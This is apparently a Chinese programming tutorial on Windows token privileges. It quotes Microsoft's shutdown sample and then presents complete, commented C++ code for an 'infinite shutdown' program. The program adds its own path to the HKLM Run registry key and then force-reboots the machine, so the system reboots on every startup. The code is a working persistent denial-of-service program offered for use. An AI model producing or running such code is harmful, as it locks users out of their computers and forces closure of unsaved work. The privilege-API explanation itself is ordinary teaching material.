在windows系统中,当涉及本进程去操作其他进程,或者要用shutdown这些高危命令的时候就涉及提权,下面是MSDN的列子
提权三兄弟
OpenProcessToken
LookupPrivilegevalue
AdjustTokenPrivileges
我们用下面这个MSDN的代码来做一个注册表无限关机的列子
#include <windows.h>
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "advapi32.lib")
BOOL MySystemShutdown()
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
// Get a token for this process.
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return( FALSE );
// Get the LUID for the shutdown privilege.
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Get the shutdown privilege for this process.
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
(PTOKEN_PRIVILEGES)NULL, 0);
if (GetLastError() != ERROR_SUCCESS)
return FALSE;
// Shut down the system and force all applications to close.
if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,
SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
SHTDN_REASON_MINOR_UPGRADE |
SHTDN_REASON_FLAG_PLANNED))
return FALSE;
//shutdown was successful
return TRUE;
}
上面是MSDN的代码,下面给出无限关机的代码(含详细注释)
// shutdownDemo.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <windows.h>
BOOL MySystemShutdown()
{
HANDLE hToken; //用于操作的句柄
TOKEN_PRIVILEGES tkp; //用于存放特定信息
// Get a token for this process.
if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
return(FALSE);
// Get the LUID for the shutdown privilege.
//如果要提权的话要在下面这两个函数提权
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
&tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1; // one privilege to set
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
// Get the shutdown privilege for this process.
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
(PTOKEN_PRIVILEGES)NULL, 0);
if (GetLastError() != ERROR_SUCCESS)
return FALSE;
// Shut down the system and force all applications to close.
if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,
SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
SHTDN_REASON_MINOR_UPGRADE |
SHTDN_REASON_FLAG_PLANNED))
return FALSE;
//shutdown was successful
return TRUE;
}
int _tmain(int argc, _TCHAR* argv[])
{
getchar();
HKEY hKey = { 0 };
/*LONG RegOpenKeyEx(
HKEY hKey, // 需要打开的主键的名称
LPCTSTR lpSubKey, //需要打开的子键的名称
DWORD ulOptions, // 保留,设为0
REGSAM samDesired, // 安全访问标记,也就是权限
PHKEY phkResult // 得到的将要打开键的句柄
)*/
RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey); //打开一个指定的注册表键
char path[MAX_PATH] = { 0 };
GetModuleFileNameA(nullptr, path, MAX_PATH); //获取当前文件路径
RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path));
MySystemShutdown();
return 0;
}
如果出现下面问题
请修改字符集如下
下面看看运行结果!